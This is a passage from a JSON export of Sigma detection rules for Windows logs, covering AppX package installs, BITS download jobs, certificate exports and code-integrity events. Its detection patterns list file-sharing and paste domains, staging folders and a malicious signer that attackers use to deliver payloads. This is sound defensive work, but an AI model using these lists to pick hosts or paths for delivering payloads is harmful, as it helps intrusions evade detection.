    "content": "title: Remote AppX Package Downloaded from File Sharing or CDN Domain\nid: 8b48ad89-10d8-4382-a546-50588c410f0d\nstatus: test\ndescription: |\n    Detects an appx package that was added to the pipeline of the \"to be processed\" packages which was downloaded from a file sharing or CDN domain.\nreferences:\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 854\n        Path|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: selection\nfalsepositives:\n    - Unlikely, unless the organization uses file sharing or CDN services to distribute internal applications.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_package_deployment_failed_signing_requirements.yml",
    "content": "title: AppX Package Deployment Failed Due to Signing Requirements\nid: 898d5fc9-fbc3-43de-93ad-38e97237c344\nstatus: test\ndescription: |\n    Detects an appx package deployment / installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements.\nreferences:\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 401\n        ErrorCode: '0x80073cff' # Check ref section to learn more about this error code\n    condition: selection\nfalsepositives:\n    - Legitimate AppX packages not signed by MS used part of an enterprise.\nlevel: medium\n\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_package_in_staging_directory.yml",
    "content": "title: AppX Located in Known Staging Directory Added to Deployment Pipeline\nid: 5cdeaf3d-1489-477c-95ab-c318559fc051\nstatus: test\ndescription: |\n    Detects an appx package that was added to the pipeline of the \"to be processed\" packages that is located in a known folder often used as a staging directory.\nreferences:\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection_eid:\n        EventID: 854\n    selection_paths_forward:\n        Path|contains: # Paths can be written using forward slash if the \"file://\" protocol is used\n            - ':/Perflogs/'\n            - ':/Users/Public/'\n            - ':/Windows/Temp/'\n            - '/AppdData/Local/Temp/'\n            - '/Desktop/'\n            - '/Downloads/'\n    selection_paths_back:\n        Path|contains: # Paths can be written using forward slash if the \"file://\" protocol is used\n            - ':\\PerfLogs\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppdData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n    condition: selection_eid and 1 of selection_paths_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml",
    "content": "title: Potential Malicious AppX Package Installation Attempts\nid: 09d3b48b-be17-47f5-bf4e-94e7e75d09ce\nstatus: test\ndescription: Detects potential installation or installation attempts of known malicious appx packages\nreferences:\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\n    - https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2023-01-12\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID:\n            - 400\n            - 401\n        # Add more malicious package names\n        # TODO: Investigate the packages here https://github.com/sophoslabs/IoCs/blob/master/Troj-BazarBackdoor.csv based on this report https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\n        PackageFullName|contains: '3669e262-ec02-4e9d-bcb4-3d008b4afac9'\n    condition: selection\nfalsepositives:\n    - Rare occasions where a malicious package uses the exact same name and version as a legitimate application.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml",
    "content": "title: Deployment Of The AppX Package Was Blocked By The Policy\nid: e021bbb5-407f-41f5-9dc9-1864c45a7a51\nstatus: test\ndescription: |\n    Detects an appx package deployment that was blocked by the local computer policy.\n    The following events indicate that an AppX package deployment was blocked by a policy:\n    - Event ID 441: The package deployment operation is blocked by the \"Allow deployment operations in special profiles\" policy\n    - Event ID 442: Deployments to non-system volumes are blocked by the \"Disable deployment of Windows Store apps to non-system volumes\" policy.\"\n    - Event ID 453: Package blocked by a platform policy.\n    - Event ID 454: Package blocked by a platform policy.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv\nauthor: frack113\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID:\n            - 441 # The package deployment operation is blocked by the \"Allow deployment operations in special profiles\" policy\n            - 442 # Deployments to non-system volumes are blocked by the \"Disable deployment of Windows Store apps to non-system volumes\" policy.\"\n            - 453 # Package blocked by a platform policy\n            - 454 # Package blocked by a platform policy\n    condition: selection\nfalsepositives:\n    - Unlikely, since this event notifies about blocked application deployment. Tune your applocker rules to avoid blocking legitimate applications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml",
    "content": "title: AppX Located in Uncommon Directory Added to Deployment Pipeline\nid: c977cb50-3dff-4a9f-b873-9290f56132f1\nstatus: test\ndescription: |\n    Detects an appx package that was added to the pipeline of the \"to be processed\" packages that is located in uncommon locations.\nreferences:\n    - Internal Research\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 854\n    filter_main_generic:\n        Path|contains:\n            # Paths can be written using forward slash if the \"file://\" protocol is used\n            - ':/Program%20Files' # Also covers 'file:///C:/Program%20Files%20(x86)/'\n            - ':/Windows/System32/'\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\ImmersiveControlPanel\\'\n            - ':\\Windows\\PrintDialog\\'\n            - ':\\Windows\\SystemApps\\'\n            - 'AppData/Local/Temp/WinGet/Microsoft.Winget.Source'\n            - 'x-windowsupdate://'\n    filter_main_specific:\n        Path|contains:\n            - 'https://installer.teams.static.microsoft/'\n            - 'https://res.cdn.office.net' # Example https://res.cdn.office.net/nativehost/5mttl/installer/v2/1.2025.617.100/Microsoft.OutlookForWindows_x64.msix\n            - 'https://statics.teams.cdn.live.net/'\n            - 'https://statics.teams.cdn.office.net/'\n            - 'microsoft.com' # Example: https://go.microsoft.com/fwlink/?linkid=2160968\n    filter_optional_onedrive:\n        Path|contains: 'AppData\\Local\\Microsoft\\OneDrive\\'\n    filter_optional_winget:\n        Path|contains:\n            - 'AppData/Local/Temp/WinGet/Microsoft.Winget.Source'\n            - 'AppData\\Local\\Temp\\WinGet\\Microsoft.Winget.Source'\n    filter_optional_x_windowsupdate:\n        Path|contains: 'x-windowsupdate://'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxpackaging_server_full_trust_package_installation.yml",
    "content": "title: Windows AppX Deployment Full Trust Package Installation\nid: e54279c7-4910-4e2c-902c-c56a25b549f6\nstatus: experimental\ndescription: Detects the installation of MSIX/AppX packages with full trust privileges which run with elevated privileges outside normal AppX container restrictions\nreferences:\n    - https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html\nauthor: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-03\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1204.002\n    - attack.t1553.005\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 400\n        HasFullTrust: true\n    filter_main_legitpath:\n        PackageSourceUri|startswith:\n            - 'file:///C:/Program%20Files/'\n            - 'file:///C:/Program%20Files%20(x86)/'\n    filter_main_microsoft:\n        - PackageSourceUri|startswith: 'https://go.microsoft.com/fwlink/?linkid'\n        - PackageSourceUri|contains:\n              - '.cdn.microsoft.com'\n              - '.cdn.office.net/'\n    filter_main_callerprocess:\n        CallingProcess|startswith:\n            - 'sysprep.exe'\n            - 'svchost.exe,AppReadiness'\n    filter_optional_x_update:\n        PackageSourceUri|startswith: 'x-windowsupdate://'\n    filter_optional_microsoftclient:\n        PackageFullName|startswith: 'MicrosoftWindows.Client.'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Some legitimate applications installation which have been missed from filtering can generate fps, thus baselining and tuning is recommended before deploying to production\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxpackaging_server_unsigned_package_installation.yml",
    "content": "title: Windows AppX Deployment Unsigned Package Installation\nid: 9a025188-6f2d-42f8-bb2f-d3a83d24a5af\nrelated:\n    - id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a\n      type: similar\n    - id: 975b2262-9a49-439d-92a6-0709cccdf0b2\n      type: similar\nstatus: experimental\ndescription: Detects attempts to install unsigned MSIX/AppX packages using the -AllowUnsigned parameter via AppXDeployment-Server events\nreferences:\n    - https://docs.microsoft.com/en-us/powershell/module/appx/add-appxpackage\n    - https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html\nauthor: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-03\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1204.002\n    - attack.t1553.005\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 603\n        Flags: '8388608'\n    condition: selection\nfalsepositives:\n    - Legitimate installation of unsigned packages for legitimate purposes such as development or testing\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml",
    "content": "title: Suspicious Digital Signature Of AppX Package\nid: b5aa7d60-c17e-4538-97de-09029d6cd76b\nstatus: test\ndescription: Detects execution of AppX packages with known suspicious or malicious signature\nreferences:\n    - Internal Research\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    product: windows\n    service: appxpackaging-om\ndetection:\n    selection:\n        EventID: 157\n        # Add more known suspicious/malicious certificates used in different attacks\n        subjectName: 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml",
    "content": "title: New BITS Job Created Via Bitsadmin\nid: 1ff315dc-2a3a-4b71-8dde-873818d25d39\nstatus: test\ndescription: Detects the creation of a new bits job by Bitsadmin\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nauthor: frack113\ndate: 2022-03-01\nmodified: 2023-03-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 3\n        processPath|endswith: '\\bitsadmin.exe'\n    condition: selection\nfalsepositives:\n    - Many legitimate applications or scripts could leverage \"bitsadmin\". This event is best correlated with EID 16403 via the JobID field\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_job_via_powershell.yml",
    "content": "title: New BITS Job Created Via PowerShell\nid: fe3a2d49-f255-4d10-935c-bda7391108eb\nstatus: test\ndescription: Detects the creation of a new bits job by PowerShell\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nauthor: frack113\ndate: 2022-03-01\nmodified: 2023-03-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 3\n        processPath|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    condition: selection\nfalsepositives:\n    - Administrator PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml",
    "content": "title: BITS Transfer Job Downloading File Potential Suspicious Extension\nid: b85e5894-9b19-4d86-8c87-a2f3b81f0521\nstatus: test\ndescription: Detects new BITS transfer job saving local files with potential suspicious extensions\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nauthor: frack113\ndate: 2022-03-01\nmodified: 2023-03-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 16403\n        LocalName|endswith:\n            # TODO: Extend this list with more interesting file extensions\n            - '.bat'\n            - '.dll'\n            - '.exe' # TODO: Might wanna comment this if it generates tons of FPs\n            - '.hta'\n            - '.ps1'\n            - '.psd1'\n            - '.sh'\n            - '.vbe'\n            - '.vbs'\n    filter_optional_generic:\n        # Typical updates: Chrome, Dropbox etc.\n        LocalName|contains: '\\AppData\\'\n        RemoteName|contains: '.com'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml",
    "content": "title: BITS Transfer Job Download From File Sharing Domains\nid: d635249d-86b5-4dad-a8c7-d7272b788586\nstatus: test\ndescription: Detects BITS transfer job downloading files from a file sharing domain.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\n    - https://twitter.com/malmoeb/status/1535142803075960832\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-28\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 16403\n        RemoteName|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml",
    "content": "title: BITS Transfer Job Download From Direct IP\nid: 90f138c1-f578-4ac3-8c49-eecfd847c8b7\nrelated:\n    - id: 99c840f2-2012-46fd-9141-c761987550ef\n      type: similar\nstatus: test\ndescription: Detects a BITS transfer job downloading file(s) from a direct IP address.\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n    - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2023-03-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 16403\n        RemoteName|contains:\n            - 'http://1'\n            - 'http://2'\n            - 'http://3'\n            - 'http://4'\n            - 'http://5'\n            - 'http://6'\n            - 'http://7'\n            - 'http://8'\n            - 'http://9'\n            - 'https://1'\n            - 'https://2'\n            - 'https://3'\n            - 'https://4'\n            - 'https://5'\n            - 'https://6'\n            - 'https://7'\n            - 'https://8'\n            - 'https://9'\n    filter_optional_local_networks:\n        RemoteName|contains:\n            - '://10.' # 10.0.0.0/8\n            - '://192.168.' # 192.168.0.0/16\n            - '://172.16.' # 172.16.0.0/12\n            - '://172.17.'\n            - '://172.18.'\n            - '://172.19.'\n            - '://172.20.'\n            - '://172.21.'\n            - '://172.22.'\n            - '://172.23.'\n            - '://172.24.'\n            - '://172.25.'\n            - '://172.26.'\n            - '://172.27.'\n            - '://172.28.'\n            - '://172.29.'\n            - '://172.30.'\n            - '://172.31.'\n            - '://127.' # 127.0.0.0/8\n            - '://169.254.' # 169.254.0.0/16\n    filter_optional_seven_zip:\n        RemoteName|contains:\n            # For https://7-zip.org/\n            - 'https://7-'\n            - 'http://7-'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml",
    "content": "title: BITS Transfer Job With Uncommon Or Suspicious Remote TLD\nid: 6d44fb93-e7d2-475c-9d3d-54c9c1e33427\nstatus: test\ndescription: Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\n    - https://twitter.com/malmoeb/status/1535142803075960832\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-10\nmodified: 2025-02-28\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 16403\n    filter_main_generic:\n        RemoteName|contains:\n            - '.azureedge.net/'\n            - '.com/'\n            - '.sfx.ms/'\n            - 'download.mozilla.org/' # https://download.mozilla.org/?product=firefox-101.0.1-partial-101.0&amp;os=win64&amp;lang=en-US\n            - 'cdn.onenote.net/'\n            - 'cdn.office.net/'\n            - 'tscdn.m365.static.microsoft/'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml",
    "content": "title: BITS Transfer Job Download To Potential Suspicious Folder\nid: f8a56cb7-a363-44ed-a82f-5926bb44cd05\nstatus: test\ndescription: Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-28\nmodified: 2023-03-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    product: windows\n    service: bits-client\ndetection:\n    selection:\n        EventID: 16403\n        LocalName|contains:\n            # TODO: Add more interesting suspicious paths\n            - '\\Desktop\\'\n            - 'C:\\Users\\Public\\'\n            - 'C:\\PerfLogs\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/capi2/win_capi2_acquire_certificate_private_key.yml",
    "content": "title: Certificate Private Key Acquired\nid: e2b5163d-7deb-4566-9af3-40afea6858c3\nstatus: test\ndescription: Detects when an application acquires a certificate private key\nreferences:\n    - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html\nauthor: Zach Mathis\ndate: 2023-05-13\ntags:\n    - attack.credential-access\n    - attack.t1649\nlogsource:\n    product: windows\n    service: capi2\n    definition: 'Requirements: The CAPI2 Operational log needs to be enabled'\ndetection:\n    selection:\n        EventID: 70 # Acquire Certificate Private Key\n    condition: selection\nfalsepositives:\n    - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml",
    "content": "title: Certificate Exported From Local Certificate Store\nid: 58c0bff0-40a0-46e8-b5e8-b734b84d2017\nstatus: test\ndescription: Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html\nauthor: Zach Mathis\ndate: 2023-05-13\ntags:\n    - attack.credential-access\n    - attack.t1649\nlogsource:\n    product: windows\n    service: certificateservicesclient-lifecycle-system\ndetection:\n    selection:\n        EventID: 1007 # A certificate has been exported\n    condition: selection\nfalsepositives:\n    - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml",
    "content": "title: CodeIntegrity - Unmet Signing Level Requirements By File Under Validation\nid: f8931561-97f5-4c46-907f-0a4a592e47a7\nstatus: experimental\ndescription: |\n    Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired.\n    This event is best correlated with EID 3089 to determine the error of the validation.\nreferences:\n    - https://twitter.com/SBousseaden/status/1483810148602814466\n    - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-20\nmodified: 2025-02-28\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID:\n            - 3033 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements.\n            - 3034 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy. However, due to code integrity auditing policy, the image was allowed to load.\n    filter_optional_dtrace:\n        # Example: Code Integrity determined that a process (\\Device\\HarddiskVolume5\\Windows\\System32\\svchost.exe) attempted to load \\Device\\HarddiskVolume5\\Program Files\\DTrace\\dtrace.dll that did not meet the Windows signing level requirements.\n        FileNameBuffer|endswith: '\\Program Files\\DTrace\\dtrace.dll'\n        ProcessNameBuffer|endswith: '\\Windows\\System32\\svchost.exe'\n        RequestedPolicy: 12\n    filter_optional_av_generic:\n        # Example: Code Integrity determined that a process (\\Device\\HarddiskVolume5\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2207.7-0\\MsMpEng.exe) attempted to load \\Device\\HarddiskVolume5\\Windows\\System32\\DriverStore\\FileRepository\\iigd_dch.inf_amd64_36fb67bd6dbd887d\\igd10iumd64.dll that did not meet the Custom 3 / Antimalware signing level requirements.\n        FileNameBuffer|contains: '\\Windows\\System32\\DriverStore\\FileRepository\\'\n        FileNameBuffer|endswith: '\\igd10iumd64.dll'\n        # ProcessNameBuffer is AV products\n        RequestedPolicy: 7\n    filter_optional_electron_based_app:\n        # Example: Code Integrity determined that a process (\\Device\\HarddiskVolume5\\Users\\user\\AppData\\Local\\Keybase\\Gui\\Keybase.exe) attempted to load \\Device\\HarddiskVolume5\\Windows\\System32\\nvspcap64.dll that did not meet the Microsoft signing level requirements.\n        FileNameBuffer|endswith: '\\Windows\\System32\\nvspcap64.dll'\n        ProcessNameBuffer|endswith:\n            - '\\AppData\\Local\\Keybase\\Gui\\Keybase.exe'\n            - '\\Microsoft\\Teams\\stage\\Teams.exe'\n        RequestedPolicy: 8\n    filter_optional_bonjour:\n        FileNameBuffer|endswith: '\\Program Files\\Bonjour\\mdnsNSP.dll'\n        ProcessNameBuffer|endswith:\n            - '\\Windows\\System32\\svchost.exe'\n            - '\\Windows\\System32\\SIHClient.exe'\n        RequestedPolicy:\n            - 8\n            - 12\n    filter_optional_msoffice_1:\n        FileNameBuffer|contains: '\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE'\n        FileNameBuffer|endswith: '\\MSOXMLMF.DLL'\n        # ProcessNameBuffer is AV products\n        RequestedPolicy: 7\n    filter_optional_msoffice_2:\n        ProcessNameBuffer|contains: '\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office'\n        FileNameBuffer|contains: '\\Windows\\System32\\'\n        RequestedPolicy: 8\n    filter_optional_slack:\n        # Example: https://user-images.githubusercontent.com/112784902/197407680-96d4b662-8a59-4289-a483-b24d630ac2a9.png\n        # Even though it's the same DLL as the one used in the electron based app filter. We need to do a separate selection due to slack's folder naming convention with the version number :)\n        FileNameBuffer|endswith: '\\Windows\\System32\\nvspcap64.dll'\n        ProcessNameBuffer|contains: '\\AppData\\Local\\slack\\app-'\n        ProcessNameBuffer|endswith: '\\slack.exe'\n        RequestedPolicy: 8\n    filter_optional_firefox:\n        # Example: https://user-images.githubusercontent.com/62423083/197451483-70e89010-ed96-4357-8079-b5a061a239d6.png\n        FileNameBuffer|endswith:\n            - '\\Mozilla Firefox\\mozavcodec.dll'\n            - '\\Mozilla Firefox\\mozavutil.dll'\n        ProcessNameBuffer|endswith: '\\Mozilla Firefox\\firefox.exe'\n        RequestedPolicy: 8\n    filter_optional_avast:\n        FileNameBuffer|endswith:\n            - '\\Program Files\\Avast Software\\Avast\\aswAMSI.dll'\n            - '\\Program Files (x86)\\Avast Software\\Avast\\aswAMSI.dll'\n        RequestedPolicy:\n            - 8\n            - 12\n    filter_main_gac:\n        # Filtering the path containing this string because of multiple possible DLLs in that location\n        FileNameBuffer|contains: '\\Windows\\assembly\\GAC\\'\n        ProcessNameBuffer|endswith: '\\mscorsvw.exe'\n        ProcessNameBuffer|contains: '\\Windows\\Microsoft.NET\\'\n        RequestedPolicy: 8\n    filter_optional_google_drive:\n        # Example: \\Program Files\\Google\\Drive File Stream\\67.0.2.0\\crashpad_handler.exe\n        FileNameBuffer|contains: '\\Program Files\\Google\\Drive File Stream\\'\n        FileNameBuffer|endswith: '\\crashpad_handler.exe'\n        ProcessNameBuffer|endswith: 